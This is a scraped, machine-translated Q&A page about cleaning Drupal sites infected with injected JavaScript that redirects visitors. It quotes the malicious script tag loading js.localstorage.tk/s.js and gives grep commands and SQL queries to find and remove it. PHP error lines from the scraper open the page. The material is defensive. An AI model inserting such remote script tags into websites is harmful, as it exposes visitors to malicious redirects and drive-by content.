Warning: file_get_contents(/data/phpspider/zhask/data//catemap/0/drupal/3.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
在服务器的所有drupal网站中注入Javascript_Javascript_Drupal_Client Side Attacks - Fatal编程技术网
Fatal编程技术网
  • javascript/
  • 在服务器的所有drupal网站中注入Javascript

在服务器的所有drupal网站中注入Javascript

javascript drupal

在服务器的所有drupal网站中注入Javascript,javascript,drupal,client-side-attacks,Javascript,Drupal,Client Side Attacks,从最近几天开始,我的网站遭到了恶意攻击。当我打开一个站点时,它首先转到另一个页面上的重定向页面(可能是广告页面) 在chrome浏览器中,当我试图通过控制台(F12)诊断问题时,我发现它显示了一个奇怪的错误。“加载资源失败:net::ERR_NAME_NOT_RESOLVED”,url为-。在进一步的调查中,我发现它在特定服务器上每个网站的每个页面负载上都注入了以下脚本。(不是一个站点,而是3-4个站点在同一服务器上感染了相同的攻击) 我还尝试在受感染网站的托管文件系统中找到这个代码片段,使用下

从最近几天开始,我的网站遭到了恶意攻击。当我打开一个站点时,它首先转到另一个页面上的重定向页面(可能是广告页面)

在chrome浏览器中,当我试图通过控制台(F12)诊断问题时,我发现它显示了一个奇怪的错误。“加载资源失败:net::ERR_NAME_NOT_RESOLVED”,url为-。在进一步的调查中,我发现它在特定服务器上每个网站的每个页面负载上都注入了以下脚本。(不是一个站点,而是3-4个站点在同一服务器上感染了相同的攻击)

我还尝试在受感染网站的托管文件系统中找到这个代码片段,使用下面的各种“grep”命令,但我什么也找不到

 grep -rwn /var/www/ -e 'js.localstorage.tk'
 grep -rwn /var/www/ -e 'var z'
 grep -rwn /var/www/ -e 'z.type'
 grep -rwn /var/www/ -e 'z.src'
 grep -rwn /var/www/ -e 'crt=new'
但没有恶意注入脚本的线索。在DB调查中也有同样的结果

当我在没有互联网的情况下通过局域网访问我的站点时,同样的错误出现在一些奇怪的URL上:

GET https://js.localstorage.tk/s.js?crt=new net::ERR_NAME_NOT_RESOLVED debugger:///VM359:1
最糟糕的是,现在谷歌已经将我的网站列入了“危险”名单,并以深红色背景显示警告“前方有欺骗性网站”

任何帮助

使用此命令查找代码

grep-rwn/var/www/-e'eval(String.fromCharCode)

您应该检查数据库

我也有同样的问题,在body\u summary列的field\u data\u body表的每一行中都找到了脚本

使用以下查询对所有表执行查询:%js.localstorage.tk%

以下是删除查询:

UPDATE field_data_body SET `body_summary`=REPLACE(`body_summary`,"<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>","");

updatefield\u data\u body SET`body\u summary`=REPLACE(`body\u summary`,“”,“”);
谢谢@sadadd。你说得对。这个命令给了我受影响文件的完整列表。有人能解释一下这些文件是如何受到影响的吗?我是否应该进一步调查任何批处理文件或某些病毒文件?如果是,那么是如何进行的。在我的情况下,所有*.tpl.php文件都在/var/www/directory中得到了保护。在我的情况下,@sadadd的回答帮助和工作得很好。正如我在问题中提到的,我无法使用like运算符在DB中找到任何这样的关键字。顺便说一句,感谢您共享您的场景,以便它可能有助于此线程的未来访问者。此外,如果您能够找到,请共享所述攻击的路由原因。服务器/文件的哪一部分受损,从而导致此攻击是否发生了恶意事件?@SohelPathan:我在过去几周没有及时升级到最新Drupal版本的服务器上看到过这种情况。有关详细信息,请参阅。@B酒店感谢您的回复,如果有Drupal版本和其他安全警报,我将查看。@B酒店您是对的。它显示了通知“需要安全更新!”。我将进行更新。除此之外,我还发现该特定服务器上的所有*.tpl.php都在同一时间戳上受到影响。它是如何受到攻击的?在internet上的飞行?或者我的服务器上仍然存在导致恶意事件的批处理/脚本文件。 
UPDATE field_data_body SET `body_summary`=REPLACE(`body_summary`,"<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>","");